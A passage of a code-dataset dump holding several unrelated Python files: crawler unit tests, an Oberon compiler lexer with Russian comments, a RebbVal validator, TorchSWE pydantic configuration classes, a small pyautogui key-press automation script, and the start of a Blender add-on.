self.spider.crawl(\n *regex_flags,\n spoil_pattern=spoil_pattern,\n spoil_context=spoil_context\n )\n\n def test_recursive(self):\n self._crawl(self.provide_1_link_recursive, re.IGNORECASE, recursive=True)\n unique = 13\n broken = 1\n stored = 30\n spoil = 37\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_recursive_no_flags(self):\n self._crawl(self.provide_1_link_recursive, recursive=True)\n unique = 13\n broken = 1\n stored = 30\n spoil = 25\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_mailto_link_issue(self):\n \"\"\"\n @see https://github.com/westial/grepspider/issues/1\n \"\"\"\n self._crawl(self.provide_mailto_link, recursive=True)\n unique = 1\n broken = 0\n stored = 0\n spoil = 2\n external = 0\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_clear_spoil(self):\n self._crawl_by_spoil(\n self.provide_clear_spoil_link,\n \"lorem ipsum\",\n re.IGNORECASE,\n recursive=False,\n spoil_context=100\n )\n unique = 29\n broken = 0\n stored = 94\n spoil = 23\n external = 61\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def test_no_recursive_multiple(self):\n self._crawl(self.provide_2_links, re.IGNORECASE)\n unique = 8\n broken = 0\n stored = 9\n spoil = 7\n external = 2\n self._assert_counters(unique, broken, stored, spoil, external)\n\n def _assert_counters(self, unique, broken, stored, spoil, external):\n self.assertEqual(\n unique, len(self.spider._unique_links), 'Local unique links'\n )\n self.assertEqual(\n broken, self.spider._total_count_broken, 'Local broken links'\n )\n self.assertEqual(\n stored, self.spider._total_count_stored, 'Links found'\n )\n self.assertEqual(\n spoil, self.spider._total_count_spoil, 'Spoils found'\n )\n self.assertEqual(\n external, self.spider._total_count_external, 'External links'\n )\n\n @classmethod\n def provide_1_link_wikipedia(cls):\n return ['https://donate.wikimedia.org']\n\n @classmethod\n def provide_2_links(cls):\n return ['{!s}/page10.html'.format(cls.PAGES_ROOT_URL), '{!s}/page1.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_1_link_recursive(cls):\n return ['{!s}/page1.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_mailto_link(cls):\n return ['{!s}/page_mailto.html'.format(cls.PAGES_ROOT_URL)]\n\n @classmethod\n def provide_clear_spoil_link(cls):\n return ['{!s}/loremipsum.html'.format(cls.PAGES_ROOT_URL)]\n","repo_name":"westial/grepspider","sub_path":"tests/testgrepspider.py","file_name":"testgrepspider.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5090188479","text":"#Лексический анализатор\n\nfrom enum import Enum #подключаем класс Enum\nimport string\n\nimport text #подключаем текстовый драйвер\nimport error #подключаем сообщения об ошибках\nimport loc\n\n\n#объявляем класс Lex производный от Enum с перечислением лексем\nclass Lex(Enum):\n NONE, NAME, NUM, MODULE, IMPORT, BEGIN, END, CONST, \\\n VAR, WHILE, DO, IF, THEN, ELSIF, ELSE, MULT, DIV, MOD, \\\n PLUS, MINUS, EQ, NE, LT, LE, GT, GE, DOT, COMMA, \\\n COLON, SEMI, ASS, LPAR, RPAR, EOT = range(34) # COLON - двоеточие\n\nlex = Lex.NONE #хранит текущую лексему\nnum = 0 #содержит значение числа, если лексема NUM\nname = \"\" #содержит имя, если лексема NAME\n\nMAXINT = 0x7FFFFFFF #ограничение типа int 32-разрядами\n\n#переменная _kw - это хэш-таблица (словарь) (_ используется только в этом файле)\n_kw = { #словарь с именами и константами ключевых слов\n \"MODULE\": Lex.MODULE,\n \"IMPORT\": Lex.IMPORT,\n \"CONST\": Lex.CONST,\n \"VAR\": Lex.VAR,\n \"BEGIN\": Lex.BEGIN,\n \"END\": Lex.END,\n \"IF\": Lex.IF,\n \"THEN\": Lex.THEN,\n \"ELSIF\": Lex.ELSIF,\n \"ELSE\": Lex.ELSE,\n \"WHILE\": Lex.WHILE,\n \"DO\": Lex.DO,\n \"DIV\": Lex.DIV,\n \"MOD\": Lex.MOD,\n \"ARRAY\": Lex.NONE,\n \"RECORD\": Lex.NONE,\n \"POINTER\": Lex.NONE,\n \"SET\": Lex.NONE,\n \"WITH\": Lex.NONE,\n \"CASE\": Lex.NONE,\n \"OF\": Lex.NONE,\n \"LOOP\": Lex.NONE,\n \"EXIT\": Lex.NONE,\n \"PROCEDURE\": Lex.NONE,\n \"FOR\": Lex.NONE,\n \"TO\": Lex.NONE,\n \"BY\": Lex.NONE,\n \"IN\": Lex.NONE,\n \"IS\": Lex.NONE,\n \"NIL\": Lex.NONE,\n \"OR\": Lex.NONE,\n \"TYPE\": Lex.NONE,\n \"REPEAT\": Lex.NONE,\n \"UNTIL\": Lex.NONE,\n \"RETURN\": Lex.NONE\n}\n\n\n# словарь для подставления имени лексемы в сообщении об ошибках\n_names = {\n Lex.NAME: 'имя',\n Lex.NUM: 'число',\n Lex.MULT: '\"*\"',\n Lex.PLUS: '\"+\"',\n Lex.MINUS: '\"-\"',\n Lex.EQ: '\"=\"',\n Lex.NE: '\"#\"',\n Lex.LT: '\"<\"',\n Lex.LE: '\"<=\"',\n Lex.GT: '\">\"',\n Lex.GE: '\">=\"',\n Lex.DOT: '\".\"',\n Lex.COMMA: '\",\"',\n Lex.COLON: '\":\"',\n Lex.SEMI: '\";\"',\n Lex.ASS: '\":=\"',\n Lex.LPAR: '\"(\"',\n Lex.RPAR: '\")\"',\n Lex.EOT: '\"конец текста\"',\n}\n\n# подставляет имя лексемы для сообщения об ошибках\ndef lexName(L: Lex):\n return _names.get(L, L.name)\n\n\n#Собирает имя идентификатора в одну строку\ndef scanName():\n global name, lex #Указываем, что name и lex глобальные переменные\n name = text.ch #Первый символ идентификатора или ключевого слова\n text.nextCh()\n while text.ch in string.ascii_letters + string.digits:\n name += text.ch #читаем остальные символы и цифры\n text.nextCh()\n #print(name)\n lex = _kw.get(name, Lex.NAME) #если ключ есть в словаре..., если нет, то второй параметр\n #print(lex)\n\n\n#собираем число\ndef scanNumber():\n global num, lex #глобальная переменная\n num = 0\n while text.ch in string.digits: #пока идут цифры\n #d = int(text.ch) #конвертируем строку в integer\n d = ord(text.ch) - ord('0') #перевод из строки в int через вычитание кода ASCII\n if num > (MAXINT - d)//10: #проверка на размер int\n error.lexError(\"Слишком большое число\")\n else:\n num = 10*num + d #накапливание числа слева направо\n text.nextCh()\n lex = Lex.NUM\n #print(num)\n\n\n#обработка комментариев\ndef Comment():\n # пропуск *\n text.nextCh()\n while True:\n while text.ch not in {'*', text.chEOT}:\n # проверяем на начало вложенного комментария\n if text.ch == '(':\n text.nextCh()\n if text.ch == '*':\n Comment()\n else:\n text.nextCh()\n if text.ch == text.chEOT:\n error.lexError(\"Не закончен комментарий\")\n else: # здесь *\n text.nextCh()\n if text.ch == ')': break\n\n text.nextCh()\n\n\n#функция выбора следующей лексемы (это и есть сам сканер)\ndef nextLex():\n global lex #глобальная переменная\n\n while text.ch in {text.chSPACE, text.chTAB, text.chEOL}:\n text.nextCh() #пропускаем пробелы, табуляцию, и конец строки\n\n # переводим указатель курсора на начало лексемы\n loc.lexPos = loc.pos\n\n if text.ch in string.ascii_letters: #если сивол (большой и малый регистр)\n scanName()\n elif text.ch in string.digits: #если цифра\n scanNumber()\n elif text.ch == ';':\n lex = Lex.SEMI\n text.nextCh()\n elif text.ch == '.':\n lex = Lex.DOT\n text.nextCh()\n elif text.ch == ',':\n lex = Lex.COMMA\n text.nextCh()\n elif text.ch == '+':\n lex = Lex.PLUS\n text.nextCh()\n elif text.ch == '-':\n lex = Lex.MINUS\n text.nextCh()\n elif text.ch == '*':\n lex = Lex.MULT\n text.nextCh()\n elif text.ch == ':':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.ASS\n text.nextCh()\n else:\n lex = Lex.COLON\n elif text.ch == '=':\n lex = Lex.EQ\n text.nextCh()\n elif text.ch == '#':\n lex = Lex.NE\n text.nextCh()\n elif text.ch == '>':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.GE\n text.nextCh()\n else:\n lex = Lex.GT\n elif text.ch == '<':###########\n text.nextCh()\n if text.ch == '=':\n lex = Lex.LE\n text.nextCh()\n else:\n lex = Lex.LT\n elif text.ch == '(':#############\n text.nextCh()\n if text.ch == '*':\n Comment() #пропускаем комментарий\n nextLex() #вызываем новую лексему\n else:\n lex = Lex.LPAR\n elif text.ch == ')':\n lex = Lex.RPAR\n text.nextCh()\n elif text.ch == text.chEOT: #если конец файла\n lex = Lex.EOT\n else:\n error.lexError(\"Недопустимый символ\")\n text.nextCh()\n\n\n#def lex():\n# return _lex\n\n","repo_name":"GorComComputing/Oberon_Compiler","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70401554362","text":"import datetime\n\nfrom antlr4 import InputStream, CommonTokenStream\n\nfrom rebbval.RebbValErrorListener import RebbValErrorListener\nfrom rebbval.EvalVisitor import EvalVisitor\nfrom rebbval.RebbValHelper import RebbValHelper\nfrom rebbval.RebbValLexer import RebbValLexer\nfrom rebbval.RebbValParser import RebbValParser\n\n\nclass RebbVal:\n global_config = dict()\n\n def __init__(self):\n self.has_error = False\n self.errors = []\n self.engine = EvalVisitor(\"\", RebbVal.global_config)\n\n def date(self, date_str):\n try:\n return datetime.datetime.strptime(date_str, '%Y-%m-%d')\n except ValueError as error:\n self.errors.append(str(error))\n return None\n\n def year(self, year_str):\n try:\n return datetime.datetime.strptime(year_str + \"-01-01\", '%Y-%m-%d')\n except ValueError as error:\n self.errors.append(str(error))\n return None\n\n\n @staticmethod\n def add_global_config(key, value):\n RebbVal.global_config[key] = value\n\n def add_config(self, key, value):\n self.engine.add_config(key, value)\n\n def val(self, obj, condition):\n self.errors = []\n\n input_stream = InputStream(condition)\n lexer = RebbValLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = RebbValParser(stream)\n parser.addErrorListener(RebbValErrorListener.INSTANCE)\n tree = parser.unaryTests()\n if RebbValErrorListener.INSTANCE.error:\n self.errors.append(RebbValErrorListener.INSTANCE.error)\n RebbValErrorListener.INSTANCE.error = \"\"\n return False\n\n self.engine.set_object(obj)\n self.engine.visit(tree)\n if not self.engine.is_valid():\n self.has_error = True\n if obj is None:\n error_message = \"object is null\"\n else:\n error_message = str(obj) + \" \" + condition + \" failed\"\n\n if self.engine.get_error() is not None and self.engine.get_error() != \"\":\n error_message = error_message + \"(\" + self.engine.get_error() + \")\"\n\n self.errors.append(error_message)\n return False\n\n return True\n\n def register_custom_validator(self, name, func):\n return self.engine.register_custom_validator(name, func)\n\n","repo_name":"tmfc/RebbVal-Python","sub_path":"rebbval/RebbVal.py","file_name":"RebbVal.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39699101618","text":"import pathlib as _pathlib\nfrom typing import Literal as _Literal\nfrom typing import Tuple as _Tuple\nfrom typing import Union as _Union\nfrom typing import Optional as _Optional\nfrom yaml import load as _load\nfrom yaml import Loader as _Loader\nfrom yaml import add_constructor as _add_constructor\nfrom yaml import add_representer as _add_representer\nfrom pydantic import BaseModel as _BaseModel\nfrom pydantic import Field as _Field\nfrom pydantic import validator as _validator\nfrom pydantic import root_validator as _root_validator\nfrom pydantic import conint as _conint\nfrom pydantic import confloat as _confloat\nfrom pydantic import validate_model as _validate_model\n\n\n# alias to type hints\nBCTypeHint = _Literal[\"periodic\", \"extrap\", \"const\", \"inflow\", \"outflow\"]\n\nOutputTypeHint = _Union[\n _Tuple[_Literal[\"at\"], _Tuple[_confloat(ge=0), ...]],\n _Tuple[\n _Literal[\"t_start every_seconds multiple\"],\n _confloat(ge=0), _confloat(gt=0), _conint(ge=1)\n ],\n _Tuple[_Literal[\"t_start every_steps multiple\"], _confloat(ge=0), _conint(ge=1), _conint(ge=1)],\n _Tuple[_Literal[\"t_start t_end n_saves\"], _confloat(ge=0), _confloat(gt=0), _conint(ge=1)],\n _Tuple[_Literal[\"t_start t_end no save\"], _confloat(ge=0), _confloat(gt=0)],\n _Tuple[_Literal[\"t_start n_steps no save\"], _confloat(ge=0), _conint(ge=1)],\n]\n\nTemporalTypeHint = _Literal[\"Euler\", \"SSP-RK2\", \"SSP-RK3\"]\n\n\nclass BaseConfig(_BaseModel):\n \"\"\"Extending pydantic.BaseModel with __getitem__ method.\"\"\"\n\n class Config: # pylint: disable=too-few-public-methods\n \"\"\"pydantic configuration of this model.\"\"\"\n validate_all = True\n allow_population_by_field_name = True\n arbitrary_types_allowed = True\n extra = \"forbid\"\n\n def __getitem__(self, key):\n return super().__getattribute__(key)\n\n def __setitem__(self, key, value):\n self.__setattr__(key, value)\n\n def check(self):\n \"\"\"Manually trigger the validation of the data in this instance.\"\"\"\n _, _, validation_error = _validate_model(self.__class__, self.__dict__)\n\n if validation_error:\n raise validation_error\n\n for field in self.__dict__.values():\n if isinstance(field, BaseConfig):\n field.check()\n\n\nclass SpatialConfig(BaseConfig):\n \"\"\"An object holding spatial configuration.\n\n Attributes\n ----------\n domain : a list/tuple of 4 floats\n The elements correspond the the bounds in west, east, south, and north.\n discretization : a list/tuple of 2 int\n The elements correspond the number of cells in west-east and south-north directions.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n domain: _Tuple[float, float, float, float]\n discretization: _Tuple[_conint(strict=True, gt=0), _conint(strict=True, gt=0)]\n\n @_validator(\"domain\")\n def domain_direction(cls, v):\n \"\"\"Validate the East >= West and North >= South.\n \"\"\"\n assert v[1] > v[0], \"domain[1] must greater than domain[0]\"\n assert v[3] > v[2], \"domain[3] must greater than domain[2]\"\n return v\n\n\nclass TemporalConfig(BaseConfig):\n \"\"\"An object holding temporal configuration.\n\n Attributes\n ----------\n start : float\n The start time of the simulation, i.e., the time that the initial conditions are applied.\n end : float\n The end time of the simulation, i.e., the simulation stops when reaching this time.\n output : list/tuple or None\n Three available formats:\n 1. [\"at\", [t1, t2, t3, t4, ...]]:\n saves solutions at t1, t2, t3, ..., etc.\n 2. [\"t_start every_seconds multiple\", t0, dt, n]:\n starting from t0, saves solutions every dt seconds for n times.\n 3. [\"t_start every_steps multiple\", t0, n0, n1]:\n starting from t0, saves solutions every n0 time steps for n1 times\n 4. [\"t_start t_end n_saves\", t0, t1, n]:\n starting from t0, evenly saves n solutions up to time t1.\n 5. [\"t_start t_end no save\", t0, t1]:\n runs the simulation from t0 to t1 without saving any solutions.\n 6. [\"t_start n_steps no save\", t0, n]:\n runs the simulation from t0 and runs for n steps without saving any solutions.\n Default: None\n scheme : str\n Currently, either \"Euler\", \"RK2\", or \"RK4\". Default: \"RK2\"\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n dt: _confloat(gt=0.) = 1e-3\n adaptive: bool = True\n output: OutputTypeHint\n max_iters: _conint(gt=0) = _Field(1000000, alias=\"max iterations\")\n scheme: TemporalTypeHint = \"SSP-RK2\"\n\n @_validator(\"output\")\n def _val_output_method(cls, v, values):\n \"\"\"Validate that end time > start time.\"\"\"\n\n if v[0] == \"at\":\n msg = \"Times are not monotonically increasing\"\n assert all(v[1][i] > v[1][i-1] for i in range(1, len(v[1]))), msg\n elif v[0] in [\"t_start every_steps multiple\", \"t_start n_steps no save\"]:\n assert not values[\"adaptive\"], \"Needs \\\"adaptive=False\\\".\"\n elif v[0] in [\"t_start t_end n_saves\", \"t_start t_end no save\"]:\n assert v[2] > v[1], \"End time is not greater than start time.\"\n\n return v\n\n @_validator(\"max_iters\")\n def _val_max_iters(cls, v, values):\n \"\"\"Validate and modify max_iters.\"\"\"\n try:\n if values[\"output\"][0] in [\"t_start every_steps multiple\", \"t_start n_steps no save\"]:\n v = values[\"output\"][2] # use per_step as max_iters\n except KeyError as err:\n raise AssertionError(\"Fix `output` first\") from err\n return v\n\n\nclass SingleBCConfig(BaseConfig):\n \"\"\"An object holding configuration of the boundary conditions on a single boundary.\n\n Attributes\n ----------\n types : a length-3 tuple/list of str\n Boundary conditions correspond to the three conservative quantities. If the type is\n \"inflow\", they correspond to non-conservative quantities, i.e., u and v. Applying \"inflow\"\n to depth h or elevation w seems not be make any sense.\n values : a length-3 tuple of floats or None\n Some BC types require user-provided values (e.g., \"const\"). Use this to give values.\n Usually, they are the conservative quantities, i.e., w, hu, and hv. For \"inflow\", however,\n they are non-conservative quantities, i.e., u and v. Defautl: [None, None, None]\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n types: _Tuple[BCTypeHint, BCTypeHint, BCTypeHint]\n values: _Tuple[_Optional[float], _Optional[float], _Optional[float]] = [None, None, None]\n\n @_validator(\"types\")\n def check_periodicity(cls, v):\n \"\"\"If one component is periodic, all components should be periodic.\"\"\"\n if any(t == \"periodic\" for t in v):\n assert all(t == \"periodic\" for t in v), \"All components should be periodic.\"\n return v\n\n @_validator(\"values\")\n def check_values(cls, v, values):\n \"\"\"Check if values are set accordingly for some BC types.\n \"\"\"\n if \"types\" not in values:\n return v\n\n for bctype, bcval in zip(values[\"types\"], v):\n if bctype in (\"const\", \"inflow\"):\n assert isinstance(bcval, float), \\\n f\"Using BC type \\\"{bctype.value}\\\" requires setting a value.\"\n return v\n\n\nclass BCConfig(BaseConfig):\n \"\"\"An object holding configuration of the boundary conditions of all boundaries.\n\n Attributes\n ----------\n west, east, north, south : SingleBCConfig\n Boundary conditions on west, east, north, and south boundaries.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n west: SingleBCConfig\n east: SingleBCConfig\n north: SingleBCConfig\n south: SingleBCConfig\n\n @_root_validator(pre=False)\n def check_periodicity(cls, values):\n \"\"\"Check whether periodic BCs match at corresponding boundary pairs.\"\"\"\n if any((t not in values) for t in [\"west\", \"east\", \"south\", \"north\"]):\n return values\n\n result = True\n for types in zip(values[\"west\"][\"types\"], values[\"east\"][\"types\"]):\n if any(t == \"periodic\" for t in types):\n result = all(t == \"periodic\" for t in types)\n for types in zip(values[\"north\"][\"types\"], values[\"south\"][\"types\"]):\n if any(t == \"periodic\" for t in types):\n result = all(t == \"periodic\" for t in types)\n if not result:\n raise ValueError(\"Periodic BCs do not match at boundaries and components.\")\n return values\n\n\nclass ICConfig(BaseConfig):\n \"\"\"An object holding configuration of the initial conditions.\n\n Attributes\n ----------\n file : None or str or path-like object\n The path to a NetCDF file containing IC data.\n keys : None or a tuple/list of str\n The variable names in the `file` that correspond to w, hu, and hv. If `file` is None, this\n can be None.\n values : None or a tuple/list of floats\n If `file` is None, use this attribute to specify constant IC values.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n file: _Optional[_pathlib.Path]\n keys: _Optional[_Tuple[str, str, str]]\n xykeys: _Optional[_Tuple[str, str]]\n values: _Optional[_Tuple[float, float, float]]\n\n @_root_validator(pre=True)\n def check_mutually_exclusive_attrs(cls, values):\n \"\"\"\\\"file\\\" and \\\"values\" should be mutually exclusive.\n \"\"\"\n if \"file\" in values and values[\"file\"] is not None:\n if \"values\" in values and values[\"values\"] is not None:\n raise AssertionError(\"Only one of \\\"file\\\" or \\\"values\\\" can be set for I.C.\")\n\n if \"keys\" not in values or values[\"keys\"] is None:\n raise AssertionError(\"\\\"keys\\\" has to be set when \\\"file\\\" is not None for I.C.\")\n\n if \"xykeys\" not in values or values[\"keys\"] is None:\n raise AssertionError(\"\\\"xykeys\\\" has to be set when \\\"file\\\" is not None for I.C.\")\n else: # \"file\" is not specified or is None\n if \"values\" not in values or values[\"values\"] is None:\n raise AssertionError(\"Either \\\"file\\\" or \\\"values\\\" has to be set for I.C.\")\n\n return values\n\n\nclass TopoConfig(BaseConfig):\n \"\"\"An object holding configuration of the topography file.\n\n Attributes\n ----------\n file : str or path-like object\n The path to a NetCDF file containing topography data.\n key : str\n The variable name in the `file` that corresponds to elevation data.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n file: _pathlib.Path\n key: str\n xykeys: _Tuple[str, str]\n\n\nclass PointSourceConfig(BaseConfig):\n \"\"\"An object holding configuration of point sources.\n\n Attributes\n ----------\n loc : a tuple of two floats\n The coordinates of the point source.\n times : a tuple of floats\n Times to change flow rates.\n rates : a tiple of floats\n Flow rates to use during specified time intervals.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n loc: _Tuple[_confloat(strict=True), _confloat(strict=True)] = _Field(..., alias=\"location\")\n times: _Tuple[_confloat(strict=True), ...]\n rates: _Tuple[_confloat(strict=True, ge=0.), ...]\n init_dt: _confloat(strict=True, gt=0.) = _Field(1e-3, alias=\"initial dt\")\n\n @_validator(\"times\")\n def val_times(cls, val):\n \"\"\"Validate the tuple of times.\"\"\"\n for i in range(1, len(val)):\n assert val[i] - val[i-1] > 0., f\"{val[i]} is not greater than {val[i-1]}\"\n return val\n\n @_validator(\"rates\")\n def val_rates(cls, val, values):\n \"\"\"Validate the tuple of rates.\"\"\"\n try:\n target = values[\"times\"]\n except KeyError as err:\n raise AssertionError(\"must correct `times` first\") from err\n\n assert len(val) == len(target) + 1, \\\n f\"the length of rates ({len(val)}) does not match that of times ({len(target)})\"\n\n return val\n\n\nclass ParamConfig(BaseConfig):\n \"\"\"An object holding configuration of miscellaneous parameters.\n\n Attributes\n ----------\n gravity : float\n Gravity in m^2/sec. Default: 9.81\n theta : float\n Parameter controlling numerical dissipation. 1.0 < theta < 2.0. Default: 1.3\n drytol : float\n Dry tolerance in meters. Default: 1.0e-4.\n ngh : int\n Number of ghost cell layers per boundary. At least 2 required.\n dtype : str\n The floating number type. Either \"float32\" or \"float64\". Default: \"float64\"\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n gravity: _confloat(ge=0.) = 9.81\n theta: _confloat(ge=1., le=2.) = 1.3\n drytol: _confloat(ge=0.) = _Field(1.0e-4, alias=\"dry tolerance\")\n ngh: _conint(ge=2) = 2\n log_steps: _conint(ge=1) = _Field(100, alias=\"print steps\")\n dtype: _Literal[\"float32\", \"float64\"] = \"float64\"\n\n @_validator(\"ngh\")\n def _val_ngh(cls, val):\n \"\"\"Currently only support ngh=2\"\"\"\n assert val == 2, \"Currently, the solver only supports ngh = 2\"\n return val\n\n\nclass FluidPropsConfig(BaseConfig):\n \"\"\"An object holding configuration of fluid properties.\n\n Attributes\n ----------\n ref_mu : float\n A reference dynamic viscosity in unit mPa-s (= cP = 1e-3 kg/s/m)\n ref_temp : float\n The reference temperature at which the `ref_mu` is defined. Unit: Celsius.\n amb_temp : float\n The ambiant temperature at which the simulation operates. Unit: Celsius.\n rho : float\n The density of fluid at `amb_temp`. Unit: kg/m^3\n nu : float\n The kinematic viscosity at `amb_temp`. Unit: m^2/s\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n rho: _confloat(strict=True, gt=0.) = _Field(..., alias=\"density\")\n ref_mu: _confloat(strict=True, gt=0.) = _Field(..., alias=\"reference mu\")\n ref_temp: _confloat(strict=True, gt=-273.15) = _Field(..., alias=\"reference temperature\")\n amb_temp: _confloat(strict=True, gt=-273.15) = _Field(..., alias=\"ambient temperature\")\n nu : _Optional[_confloat(strict=True, gt=0.)] = _Field(None)\n\n @_validator(\"nu\")\n def val_nu(cls, val, values):\n \"\"\"Validate nu.\"\"\"\n if val is None:\n # get dynamic viscosity at ambient temperature (unit: cP) (Lewis-Squires correlation)\n val = values[\"ref_mu\"]**(-0.2661) + (values[\"amb_temp\"] - values[\"ref_temp\"]) / 233.\n val = val**(-1./0.2661) * 1e-3 # convert to kg / s / m\n\n try:\n val /= values[\"rho\"] # kinematic viscosity (m^2 / s)\n except KeyError as err:\n raise AssertionError(\"Correct `density` (or `rho`) first.\") from err\n return val\n\n\nclass FrictionConfig(BaseConfig):\n \"\"\"An object holding configuration of bottom friction.\n\n Attributes\n ----------\n file : path-like or None\n The CF-compliant NetCDF file containing surface roughness data.\n key : str or None\n The key of the roughness data in the file.\n value : float or None\n A constant roughness for the whole computational domain. See notes.\n model : str\n The friction coefficient model. Currently, only \"bellos_et_al_2018\" is available.\n\n Notes\n -----\n Only one of the `file`-`key` pair or `value` can be non-None at the same time.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n file: _Optional[_pathlib.Path] = _Field(None, alias=\"roughness file\")\n key: _Optional[str] = _Field(None, alias=\"roughness key\")\n xykeys: _Optional[_Tuple[str, str]] = _Field(None, alias=\"roughness xykeys\")\n value: _Optional[_confloat(strict=True, ge=0.)] = _Field(None, alias=\"roughness\")\n model: _Literal[\"bellos_et_al_2018\"] = _Field(\"bellos_et_al_2018\", alias=\"coefficient model\")\n\n @_validator(\"value\")\n def val_value(cls, val, values):\n \"\"\"Validate FrictionConfig.value\"\"\"\n try:\n if val is None:\n msg = \"when not using constant roughness, {} must be set\"\n assert values[\"file\"] is not None, msg.format(\"roughness file\")\n assert values[\"key\"] is not None, msg.format(\"roughness key\")\n assert values[\"xykeys\"] is not None, msg.format(\"xykeys\")\n else:\n msg = \"when using constant roughness, {} must not be set\"\n assert values[\"file\"] is None, msg.format(\"roughness file\")\n assert values[\"key\"] is None, msg.format(\"roughness key\")\n assert values[\"xykeys\"] is None, msg.format(\"xykeys\")\n except KeyError as err:\n raise AssertionError(\"Please fix other fields first.\") from err\n return val\n\n\nclass Config(BaseConfig):\n \"\"\"An object holding all configurations of a simulation case.\n\n Attributes\n ----------\n spatial : SpatialConfig\n Spatial information.\n temporal : TemporalConfig\n Temporal control.\n bc : BCConfig\n Boundary conditions.\n ic : ICConfig\n Initial conditions.\n topo : TopoConfig\n Topography information.\n ptsource : PointSourceConfig\n Point source configuration.\n props : FluidProps\n Fluid properties.\n params : ParamConfig\n Miscellaneous parameters.\n prehook : None or path-like\n The path to a Python script that will be executed before running a simulation.\n case : path-like\n The path to the case folder.\n \"\"\"\n # pylint: disable=too-few-public-methods, no-self-argument, invalid-name, no-self-use\n\n spatial: SpatialConfig\n temporal: TemporalConfig\n bc: BCConfig = _Field(..., alias=\"boundary\")\n ic: ICConfig = _Field(..., alias=\"initial\")\n topo: TopoConfig = _Field(..., alias=\"topography\")\n ptsource: _Optional[PointSourceConfig] = _Field(None, alias=\"point source\")\n friction: _Optional[FrictionConfig] = _Field(None, alias=\"friction\")\n props: _Optional[FluidPropsConfig] = _Field(None, alias=\"fluid properties\")\n params: ParamConfig = _Field(ParamConfig(), alias=\"parameters\")\n prehook: _Optional[_pathlib.Path]\n case: _Optional[_pathlib.Path]\n\n @_validator(\"props\")\n def val_props(cls, val, values):\n \"\"\"Validate props.\"\"\"\n try:\n if values[\"ptsource\"] is not None and val is None:\n raise AssertionError(\"When `point source` presents, `fluid properties` must be set\")\n if values[\"friction\"] is not None and val is None:\n raise AssertionError(\"When `friction` presents, `fluid properties` must be set\")\n except KeyError as err:\n raise AssertionError(\"Please fix other fields first.\") from err\n return val\n\n\n# register the Config class in yaml with tag !Config\n_add_constructor(\n \"!Config\",\n lambda loader, node: Config(**loader.construct_mapping(node, deep=True))\n)\n\n_add_representer(\n Config,\n lambda dumper, data: dumper.represent_mapping(\n tag=\"!Config\", mapping=_load(\n data.json(by_alias=True), Loader=_Loader),\n flow_style=True\n )\n)\n\n\ndef get_config(case: str):\n \"\"\"Get configuration from a case folder.\n\n Arguments\n ---------\n case : str or os.PathLike\n The path to the case folder. A file called `config.yaml` must exsit in that folder.\n\n Returns\n -------\n torchswe.utils.config.Config\n \"\"\"\n\n case = _pathlib.Path(case).expanduser().resolve()\n\n with open(case.joinpath(\"config.yaml\"), \"r\", encoding=\"utf-8\") as fobj:\n config = _load(fobj, _Loader)\n\n assert isinstance(config, Config), \\\n f\"Failed to parse {case.joinpath('config.yaml')} as a Config object. \" + \\\n \"Check if `--- !Config` appears in the header of the YAML\"\n\n return config\n","repo_name":"piyueh/TorchSWE","sub_path":"torchswe/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":20195,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"27293658147","text":"import time\nfrom pyautogui import *\n\nwhile True:\n\t# \"민원열람 > 갑부열람\"\n\tpos1 = locateCenterOnScreen(\"gabbu.PNG\", grayscale=True)\n\ttime.sleep(0.5)\n\n\tif pos1 == None:\n\t\ttime.sleep(0.5)\n\t\tcontinue\n\telse:\n\t\t# 같은 등록번호 차량이 여러대인 경우 해당차량 선택 ==> \"자동차등록원부 조회\"\n\t\twhile True:\n\t\t\tpos2 = locateCenterOnScreen(\"wonbu_select.PNG\", grayscale=True)\n\t\t\tif pos2 != None:\n\t\t\t\ttime.sleep(0.5)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\t\n\t\t#press(['tab', 'tab', 'tab', 'tab', 'tab', 'end'])\n\t\ttime.sleep(0.5)\n\n\t\tpress(['tab', 'tab', 'tab', 'tab', 'tab', 'up'])\n\t\t\t\t\t\n\t\tpress('f4')","repo_name":"birdcagedout/SickNTired","sub_path":"gabbu.py","file_name":"gabbu.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34505255088","text":"from os.path import isabs, dirname\nfrom typing import Collection, Optional, Set\n\nfrom bpy.types import Operator, Context, UIList, UILayout, PropertyGroup, Menu, Panel\nfrom bpy.props import (\n BoolProperty,\n StringProperty,\n IntProperty,\n EnumProperty,\n CollectionProperty,\n 